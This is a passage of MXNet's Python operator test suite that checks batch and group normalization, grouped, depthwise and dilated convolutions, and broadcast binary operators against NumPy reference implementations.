bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
m = np.prod(shape) / shape[axis]
# cudnn uses m-1 in the denominator of its sample variance calculation, not m
sample_var_adjust = 1.0 if cudnn_off or fix_gamma else m / (m-1)
running_var = running_var * momentum + \
data_var_flat * sample_var_adjust * (1 - momentum)
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
adX = dX if data_grad_req != 'add' else adX + dX
adW = dW if gamma_grad_req != 'add' else adW + dW
adb = db if beta_grad_req != 'add' else adb + db
atol, rtol = 5e-2, 5e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
if is_train:
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
if data_grad_req != 'null':
assert_almost_equal(data.grad.asnumpy(),
adX.asnumpy(), atol=atol, rtol=rtol)
if not fix_gamma:
if gamma_grad_req != 'null':
assert_almost_equal(
bn_gamma.grad.asnumpy(), adW.asnumpy(),
atol=atol, rtol=rtol)
else:
assert((bn_gamma.asnumpy() == 1).all())
if beta_grad_req != 'null':
assert_almost_equal(
bn_beta.grad.asnumpy(), adb.asnumpy(), atol=atol, rtol=rtol)
grad_reqs = ['write'] if len(shape) != 4 else ['null', 'write', 'add']
for data_grad_req in grad_reqs:
for gamma_grad_req in grad_reqs:
if fix_gamma and gamma_grad_req != 'null':
continue
for beta_grad_req in grad_reqs:
for axis in range(len(shape)):
_test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req)
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
def np_groupnorm(data, gamma, beta, num_groups, eps):
new_param_shape = (1, dshape[1], 1, 1)
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat.reshape(dshape) * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
return out, mean, std
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, dshape[1], 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
beta_grad = np.sum(ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
gamma_grad = np.sum(x_hat * ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
x_hat_grad = ograd * gamma.reshape(1, num_groups, dshape[1] // num_groups, 1, 1)
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_channels,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-4, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd, dtype=np_ograd.dtype)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-4, dtype=dtype)
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1._simple_bind(default_context(), x=shape)
exe2 = y2._simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@pytest.mark.skip(reason="Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
exe1 = y1._simple_bind(dev, x=shape)
exe2 = y2._simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
assert_allclose(arr1, arr2, rtol=1e-3, atol=1e-3)
def test_convolution_independent_gradients():
# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 8]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
for dim, num_base, kernel_x, stride_x, pad_x , in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv._bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv._bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
d = gen_broadcast_data(idx);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
d = gen_binary_data(dummy);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol._bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
logging.error('input a hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol._bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
o = y.forward(is_train=True)
y.backward([mx.nd.array(out, dtype=o[0].dtype)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
is no gradient definition at those sigularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net._bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net._bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at [0,0,16,16]
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net._bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
